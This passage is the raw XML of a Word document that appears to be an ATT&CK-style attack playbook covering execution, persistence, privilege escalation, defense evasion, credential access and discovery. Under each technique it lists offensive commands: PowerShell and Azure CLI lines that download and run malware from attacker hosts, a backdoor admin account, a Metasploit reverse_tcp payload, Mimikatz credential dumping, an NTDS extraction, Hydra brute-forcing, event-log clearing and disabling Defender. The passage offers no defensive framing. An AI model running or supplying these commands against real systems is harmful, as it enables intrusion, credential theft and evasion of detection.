    <w:p w14:paraId="703F9778" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>mstsc /v:target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A2B78D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Brute-force via Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476877DC" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="001137E2" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="001137E2">
        <w:t>hydra -l user -P passlist.txt ssh://target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCB1262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4.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Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428CFCD0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Execute malicious code within the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB8EC8" w14:textId="7C376A43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T1059 – Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31529D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controls the system using native scripting interpreters.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B4792" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Host and trigger PowerShell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25359384" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136902E0" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Invoke-WebRequest http://attacker.server/malware.exe -OutFile malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA00FA3" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Start-Process malware.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D84A5E7" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>User executes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DD3F8D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBB347" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell.exe -NoProfile -ExecutionPolicy Bypass -File payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25798755" w14:textId="74F47875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T1204.002 – User Execution: Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424987DE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User triggered execution of the attacker’s file (typically by phishing).</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EE2E23" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Macro runs PowerShell command as above, with required file path to network or web share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CAA10" w14:textId="61BE24E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T1651 – Cloud Administration Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C50E3E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Abuse of cloud admin rights to run remote commands.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C01F9D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Authenticate with Azure CLI and run PowerShell on remote VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F89A1A0" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>az login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A5DED" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>az vm run-command invoke -g ResourceGroup -n VictimVM --command-id RunPowerShellScript --scripts "Invoke-WebRequest http://attacker/malware.exe -OutFile C:\\temp\\malware.exe; Start-Process C:\\temp\\malware.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC22F08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5.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Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9308E4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Ensure ongoing access despite system restarts or credential resets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C8FB81" w14:textId="7757A978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1: T1547.001 – Registry Run Keys/Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A655430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Malware is set to auto-run at startup.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B847E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Add registry entry (cmd/Powershell):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF67B17" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCE65D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "C:\malware.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7E62CA" w14:textId="3B9B5F21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2: T1053.005 – Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A0B38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System schedules attacker’s code for repeated execution.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B141B35" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D649FF1" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>schtasks /Create /SC ONLOGON /TN "UpdateTask" /TR "powershell.exe -ExecutionPolicy Bypass -File C:\malware.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6858924D" w14:textId="77677260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3: T1098 – Account Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F18531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Creating/manipulating accounts for persistence.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F6DE2" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Create user and add to admin group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D776313" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08209FEE" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>net user backdoor StrongP@ssw0rd! /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A420A3" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>net localgroup Administrators backdoor /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4184E960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6.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Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F9F1C0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Obtain admin/system rights on compromised devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BC1F79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T1068 – Exploitation for Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110652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Exploit unpatched vulnerabilities to elevate privileges.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05A792" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Use compiled/CVE exploit or Metasploit local module for privilege escalation.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
        <w:t>(Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA3F36" w14:textId="77777777" w:rsidR="006D2390" w:rsidRDefault="006D2390" w:rsidP="007A5D49"/>
    <w:p w14:paraId="2757FD25" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75973819" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>use exploit/windows/local/printnightmare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4550181C" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9BBEC" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B06BA" w14:textId="30739CE5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2: T1134.001 – Access Token Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDFE09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Steal/impersonate tokens to inherit higher privileges.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253791D6" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Use Mimikatz for Pass-the-Hash/Token Impersonation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE28E2A" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>sekurlsa::pth /user:Admin /domain:target.local /ntlm:&lt;HASH&gt; /run:powershell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1174CFC8" w14:textId="5E56D169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T1055.001 – Process Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953DC0F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Inject code into trusted processes to run with escalated rights.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312E1254" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>With Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F81E30D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F04EF3" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>set LHOST attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5211A953" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99C852" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>exploit -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A6AC3C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7.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Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2A4759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Avoid detection by security tools and logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FFFB19" w14:textId="43AC8947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 xml:space="preserve"> Technique 1: T1070.001 – Clear Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50B8CA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Removes traces of the attacker’s presence.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCDD489" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F3341" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E3A40" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>wevtutil cl Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074D89D6" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>wevtutil cl Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AD8F77" w14:textId="2A1A2F8D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2: T1140 – Deobfuscate/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51658EF6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Hide payloads/commands using obfuscation.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402A5F30" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Encode and decode scripts inline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34929CE3" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799923E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("&lt;base64string&gt;"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598C564C" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Invoke-Expression $cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D79286" w14:textId="73254D6D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3: T1562.001 – Disable or Modify Security Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241D149E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Disables endpoint security/defenses.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AACC7A5" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Disable Windows Defender real-time protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173BB0B" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="006D2390" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="007A5D49" w:rsidRPr="007A5D49">
        <w:t>owershell</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDB4E04" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Set-MpPreference -DisableRealtimeMonitoring $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4CD20F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8.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Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2364C9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Steal credentials/keys for deeper access or lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DE5CF8" w14:textId="31D39FFB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1: T1003.001 – LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA169CA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dumps passwords from LSASS process memory.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D644019" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Use Mimikatz:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBF77D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A5D49">
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A5D49">
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A5D49">
        <w:t>logonpasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="025272A5" w14:textId="4EBFC9E4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2: T1555.003 – NTDS DIT Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004DD90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dumps Active Directory credentials from domain controller.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4AAF1" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Run ntdsutil on Domain Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0EB0EC" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>ntdsutil "ac i ntds" "ifm" "create full C:\output" q q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A6319D" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Or use custom dumping scripts or tools as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCA32BE" w14:textId="5953D0B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3: T1110 – Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0993A5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Automated guessing of account credentials.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5971D4A4" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>SSH brute-force with Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF77E27" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>hydra -L users.txt -P passwords.txt ssh://target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF918E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>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">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Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256FEA4D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Map out user accounts, network, and system info inside victim environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C4D3C" w14:textId="2623BD79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1: T1087 – Account Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ABD8A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Enumerate users/groups to identify accounts of interest.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3610C" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCEF629" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C62C7B" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Get-LocalUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A53D41" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Windows CMD:</w:t>
      </w:r>
    </w:p>
